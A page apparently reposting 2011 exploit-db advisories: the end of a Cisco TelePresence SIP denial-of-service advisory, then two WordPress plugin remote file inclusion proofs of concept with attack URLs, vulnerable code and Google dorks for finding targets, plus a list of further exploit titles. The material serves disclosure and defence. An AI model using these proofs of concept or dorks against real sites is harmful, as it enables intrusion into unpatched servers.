The severity of this issue is compounded by the fact that the main

application runs as root, this could potentially lead to arbitrary code

execution.
3. Pre-authentication SIP Denial of Service - CVE-2011-2577 (CSCtq46500):

Cisco TelePresence Endpoints utilise SIP for the call setup protocol.

Sending a SIP INVITE with a 4x8 a"s in the MAC Address field and the

receive field causes the system to reboot.
Proof of Concept: MXP:

Exception 0x1100 : Data TLB load miss Active task

FsmMain FSM process : SipTrnsp(0) FSM message : SipTrnsp_Send_Msg_Req

from SipTrnsp(0) Data TLB miss (DMISS) : 0x00000000 (illegal addr.

accessed)
Solution.

Upgrade to TC4.2 for the C series to fix validation issues.
Discovered by.

David Klein, Sense of Security Labs.
About us.

Sense of Security is a leading provider of information

security and risk management solutions. Our team has expert

skills in assessment and assurance, strategy and architecture,

and deployment through to ongoing management. We are

Australia's premier application penetration testing firm and

trusted IT security advisor to many of the countries largest

organisations.
Sense of Security Pty Ltd

Level 8, 66 King St

Sydney NSW 2000

AUSTRALIA
T: +61 (0)2 9290 4444

F: +61 (0)2 9290 4455

W: http://www.senseofsecurity.com.au

E: [email protected]

Twitter: @ITsecurityAU
The latest version of this advisory can be found at:

http://www.senseofsecurity.com.au/advisories/SOS-11-010.pdf

Other Sense of Security advisories can be found at: http://www.senseofsecurity.com.au/research/it-security-advisories.php

Fonte: http://www.exploit-db.com/exploits/17871/

WordPress Relocate Upload Plugin 0.14 Remote File Inclusion

23/09/2011 little_oak Comments 0 Comment

# Exploit Title: Relocate Upload WordPress plugin RFI # Google Dork: inurl:wp-content/plugins/relocate-upload # Date: 09/19/2011 # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing) # Software Link: http://wordpress.org/extend/plugins/relocate-upload/download/ # Version: 0.14 (tested)


---

PoC

---

http://SERVER/db_unx_PATH/wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=RFI

--- Vulnerable Code --- // Move folder request handled when called by GET AJAX if (isset($_GET['ru_folder'])) { // WP setup and function access define('db_unx_USE_THEMES', false); require_once(urldecode($_GET['abspath']).'/wp-load.php'); // save us looking for it, it's passed as a GET parameter

Fonte: http://www.exploit-db.com/exploits/17869/

WordPress Mini Mail Dashboard Widget Plugin 1.36 Remote File Inclusion

23/09/2011 little_oak Comments 0 Comment

# Exploit Title: Mini Mail Dashboard Widget WordPress plugin RFI # Google Dork: inurl:wp-content/plugins/mini-mail-dashboard-widget # Date: 09/19/2011 # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing) # Software Link: http://wordpress.org/extend/plugins/mini-mail-dashboard-widget/download/ # Version: 1.36 (tested)

—
PoC
—
http://SERVER/db_unx_PATH/wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=RFI (requires POSTing a file with ID wpmm-upload for this to work)

—
Vulnerable Code
—
if (isset($_FILES[‘wpmm-upload’])) {
// Create WordPress environmnt
require_once(urldecode($_REQUEST[‘abspath’]) . ‘wp-load.php’);

// Handle attachment
WPMiniMail::wpmm_upload();
}

Fonte: http://www.exploit-db.com/exploits/17868/

AppUnix

Portal Linux, Mac OS e BSD

Browsed by
Tag: exploit

PmWiki <= 2.2.34 (pagelist) Remote PHP Code Injection Exploit

23/11/2011 little_oak Comments 0 Comment

PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection

23/11/2011 little_oak Comments 0 Comment

WordPress jetpack plugin SQL Injection Vulnerability

21/11/2011 little_oak Comments 0 Comment

OSX universal ROP shellcode Testado no SNOW LEOPARD

03/10/2011 little_oak Comments 0 Comment

NETGEAR Wireless Cable Modem Gateway Auth Bypass and CSRF

23/09/2011 little_oak Comments 3 comments

JAKCMS PRO <= 2.2.5 Remote Arbitrary File Upload Exploit

23/09/2011 little_oak Comments 0 Comment

Multiple WordPress Plugin timthumb.php Vulnerabilites

23/09/2011 little_oak Comments 3 comments

Cisco TelePresence Multiple Vulnerabilities – SOS-11-010

23/09/2011 little_oak Comments 0 Comment

WordPress Relocate Upload Plugin 0.14 Remote File Inclusion

23/09/2011 little_oak Comments 0 Comment

WordPress Mini Mail Dashboard Widget Plugin 1.36 Remote File Inclusion

23/09/2011 little_oak Comments 0 Comment